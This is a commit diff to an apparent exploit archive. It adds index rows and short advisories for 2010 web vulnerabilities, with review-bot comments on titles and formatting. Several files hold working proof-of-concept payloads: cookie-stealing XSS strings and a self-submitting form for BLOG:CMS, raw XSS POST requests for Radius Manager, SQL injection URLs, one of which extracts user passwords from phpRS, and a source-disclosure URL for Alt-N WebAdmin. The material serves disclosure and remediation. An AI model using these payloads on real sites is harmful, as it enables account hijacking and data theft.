Updated 11_01_2014
parent 63315eaa60
commit 9234afd706
9 changed files with 97 additions and 0 deletions
|
@ -31631,3 +31631,11 @@ id,file,description,date,author,platform,type,port
|
|||
35113,platforms/php/webapps/35113.php,"MAARCH 1.4 - Arbitrary File Upload",2014-10-29,"Adrien Thierry",php,webapps,80
|
||||
35114,platforms/php/webapps/35114.txt,"MAARCH 1.4 - SQL Injection",2014-10-29,"Adrien Thierry",php,webapps,80
|
||||
35115,platforms/linux/remote/35115.rb,"CUPS Filter Bash Environment Variable Code Injection",2014-10-29,metasploit,linux,remote,631
|
||||
35116,platforms/php/webapps/35116.txt,"HP Insight Diagnostics Online Edition 8.4 'search.php' CVE-2010-4111 Cross Site Scripting Vulnerability",2010-12-15,"Richard Brain",php,webapps,0
|
||||
35117,platforms/php/webapps/35117.txt,"BLOG:CMS 4.2.1 e Multiple HTML Injection and Cross Site Scripting Vulnerabilities",2010-12-15,"High-Tech Bridge SA",php,webapps,0
|
||||
35118,platforms/php/webapps/35118.txt,"phpRS 'model-kits.php' SQL Injection Vulnerability",2010-12-16,KnocKout,php,webapps,0
|
||||
35119,platforms/windows/remote/35119.txt,"Alt-N WebAdmin 3.3.3 Remote Source Code Information Disclosure Vulnerability",2010-12-17,wsn1983,windows,remote,0
|
||||
35120,platforms/php/webapps/35120.txt,"Radius Manager 3.6 Multiple Cross Site Scripting Vulnerabilities",2010-12-17,"Rodrigo Rubira Branco",php,webapps,0
|
||||
35121,platforms/php/webapps/35121.txt,"Social Share Multiple Cross Site Scripting Vulnerabilities",2010-12-17,"Aliaksandr Hartsuyeu",php,webapps,0
|
||||
35122,platforms/php/webapps/35122.txt,"Social Share 'postid' Parameter SQL Injection Vulnerability",2010-12-20,"Aliaksandr Hartsuyeu",php,webapps,0
|
||||
35123,platforms/php/webapps/35123.txt,"Mafya Oyun Scrpti 'profil.php' SQL Injection Vulnerability",2010-12-20,"DeadLy DeMon",php,webapps,0
|
||||
|
|
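Review bot: The description added for 35117 reads "BLOG:CMS 4.2.1 e", while the file added in the same commit says "BLOG:CMS 4.2.1.e is vulnerable", so a search on the version string as written in the advisory will miss this row; align the title with the file. The eight new rows also end in "Vulnerability" or "Vulnerabilities", which the context rows 35113 to 35115 do not, and 35116 is the only row that embeds a CVE id in the description. Pick one title convention for the index and apply it to all added rows.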
|
9
platforms/php/webapps/35116.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/45420/info
|
||||
|
||||
HP Insight Diagnostics Online Edition is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
Versions prior to HP Insight Diagnostics Online Edition 8.5.1.3712
|
||||
|
||||
http://www.example.com/hpdiags/frontend2/help/search.php?query="onmouseover="alert(1);
|
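Review bot: The index row for this file carries CVE-2010-4111 and version 8.4, but the body mentions neither; its only version statement is the fragment "Versions prior to HP Insight Diagnostics Online Edition 8.5.1.3712", which has no verb. Complete the sentence (for example "... are vulnerable") and add the CVE id under the source line so the file is self-describing when read without files.csv. Naming the `query` parameter of search.php in the description would also tell a reader which input needs output encoding without having to parse the URL.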
27
platforms/php/webapps/35117.txt
Executable file
|
@ -0,0 +1,27 @@
|
|||
source: http://www.securityfocus.com/bid/45432/info
|
||||
|
||||
BLOG:CMS is prone to a cross-site-scripting vulnerability and multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
|
||||
|
||||
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
|
||||
|
||||
BLOG:CMS 4.2.1.e is vulnerable; prior versions may also be affected.
|
||||
|
||||
Cross Site Scripting POCs:
|
||||
|
||||
<form action="http://host/admin/index.php" method="post" name="main">
|
||||
<input type="hidden" name="blogid" value="0">
|
||||
<input type="hidden" name="itemid" value="0">
|
||||
<input type="hidden" name="action" value="browseowncomments">
|
||||
<input type="hidden" name="amount" value='10"><script>alert(document.cookie)</script>'>
|
||||
<input type="hidden" name="start" value="0">
|
||||
<input type="hidden" name="search" value="">
|
||||
</form>
|
||||
<script>
|
||||
document.main.submit();
|
||||
</script>
|
||||
|
||||
|
||||
|
||||
|
||||
http://www.example.com/admin/index.php?action=settingsedit"><script>alert(document.cookie)</script>
|
||||
|
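Review bot: The description promises one cross-site-scripting issue and multiple HTML-injection issues, but the only heading is "Cross Site Scripting POCs:" and nothing in the file is labelled as HTML injection. The run of blank lines before the final settingsedit URL reads like a lost section heading. Label each item with the issue class and the input it concerns (`amount` in the POST form, `action` in the URL) so that a maintainer can map every entry to the field that needs encoding.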
7
platforms/php/webapps/35118.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/45467/info
|
||||
|
||||
phpRS is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
|
||||
|
||||
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
|
||||
|
||||
http://www.example.com/model-kits.php?akce=model&nazev=zis-3-1942-divisional-gun&id=-32/**/union/**/select/**/1,concat%28user,0x3a,password%29,3,4,5/**/from/**/mac_user--
|
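Review bot: No affected phpRS version is stated in this file or in its index row, unlike the neighbouring entries, which leaves a reader unable to tell whether a given install is in scope. Add a version line, or say explicitly that the version is not given by the source. The description should also name `id` in model-kits.php as the affected parameter; at present that is only deducible from the URL on the last line.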
9
platforms/php/webapps/35120.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/45481/info
|
||||
|
||||
Radius Manager is prone to multiple cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
Radius Manager 3.6.0 is vulnerable; other versions may also be affected
|
||||
|
||||
http:///admin.php?cont=update_usergroup&id=1 POST /admin.php?cont=update_usergroup&id=1 HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http:///admin.php?cont=edit_usergroup&id=1 Cookie: PHPSESSID=fo1ba9oci06jjsqkqpvptftj43; login_admin=admin; online_ordercol=username; online_ordertype=ASC; listusers_ordercol=username; listusers_ordertype=DESC; listusers_lastorder=username Content-Type: application/x-www-form-urlencoded Content-Length: 120 name=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&descr=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&Submit=Update Request 2: http:///admin.php?cont=store_nas POST /admin.php?cont=store_nas HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http:///admin.php?cont=new_nas Cookie: PHPSESSID=fo1ba9oci06jjsqkqpvptftj43; login_admin=admin; online_ordercol=username; online_ordertype=ASC; listusers_ordercol=username; listusers_ordertype=DESC; listusers_lastorder=username Content-Type: application/x-www-form-urlencoded Content-Length: 112 name=Name&nasip=10.0.0.1&type=0&secret=1111&descr=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&Submit=Add+NAS
|
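Review bot: Both captured requests sit on the single last line of this 9-line file, so header boundaries and the blank line before each body are lost and the stated Content-Length values (120 and 112) cannot be checked against the bodies. Put one header per line, add a "Request 1:" label to match "Request 2:", and fill the empty Host header and the `http:///` URLs with www.example.com as the other files in this commit do. The Cookie header also carries what looks like a real captured PHPSESSID value; replace it with a placeholder before archiving.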
9
platforms/php/webapps/35121.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/45485/info
|
||||
|
||||
Social Share is prone to multiple cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
http://www.example.com/socialshare/save.php?title=<XSS>
|
||||
|
||||
http://www.example.com/socialshare/save.php?url="><XSS>
|
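Review bot: Neither this file nor its index row gives a vendor or version for "Social Share", and the name is generic enough that a reader cannot tell which product is meant. Add whatever vendor and version information the source advisory has, or state that none is given. The description says "multiple" issues without naming them; listing `title` and `url` in save.php as the affected parameters would make the file usable as a remediation checklist.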
7
platforms/php/webapps/35122.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/45497/info
|
||||
|
||||
Social Share is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
|
||||
|
||||
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
|
||||
|
||||
http://www.example.com/socialshare/postview.php? postid=-1 union select 1,2,3,4,5,6,7,8,9,10#
|
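Review bot: The body never names the affected parameter, although the index row does ('postid'), and like 35121 it gives no vendor or version for Social Share; add both so the file stands on its own. The last line also has a space between "postview.php?" and "postid", which looks like a line-wrap artifact carried over from the source; check it against the advisory and record the URL as one token.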
7
platforms/php/webapps/35123.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/45501/info
|
||||
|
||||
Mafya Oyun Scrpti is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
|
||||
|
||||
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
|
||||
|
||||
http://www.example.com/profil.php?id=[SQL]
|
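Review bot: "Mafya Oyun Scrpti" is spelled the same way in the index row and in this file and looks like a typo for "Scripti"; confirm against the source advisory, and if the advisory itself uses this spelling, keep it but note the corrected form so title searches match. The file gives no version, and the only technical content is the placeholder `[SQL]`, so the description should at least state that `id` in profil.php is the affected input.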
14
platforms/windows/remote/35119.txt
Executable file
|
@ -0,0 +1,14 @@
|
|||
source: http://www.securityfocus.com/bid/45476/info
|
||||
|
||||
Alt-N WebAdmin is prone to a remote information-disclosure vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker can exploit this vulnerability to view the source code of files in the context of the server process; this may aid in further attacks.
|
||||
|
||||
The following versions are affected:
|
||||
|
||||
Alt-N WebAdmin 3.3.3
|
||||
U-Mail 9.8 for Windows
|
||||
U-Mail GateWay 9.8 for Windows
|
||||
|
||||
http://www.example.com/login.wdm%20
|
||||
http://www.example.com/login.wdm%2e
|
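Review bot: The body lists three affected products (Alt-N WebAdmin 3.3.3, U-Mail 9.8 for Windows, U-Mail GateWay 9.8 for Windows), but the files.csv row added in this commit names only "Alt-N WebAdmin 3.3.3", so an index search for U-Mail will not find this entry; add the other two products to the description. The two URLs differ only in the trailing `%20` and `%2e` after login.wdm, and the text does not say that this suffix is the input being mishandled. One sentence stating that would tell defenders what to look for in request logs.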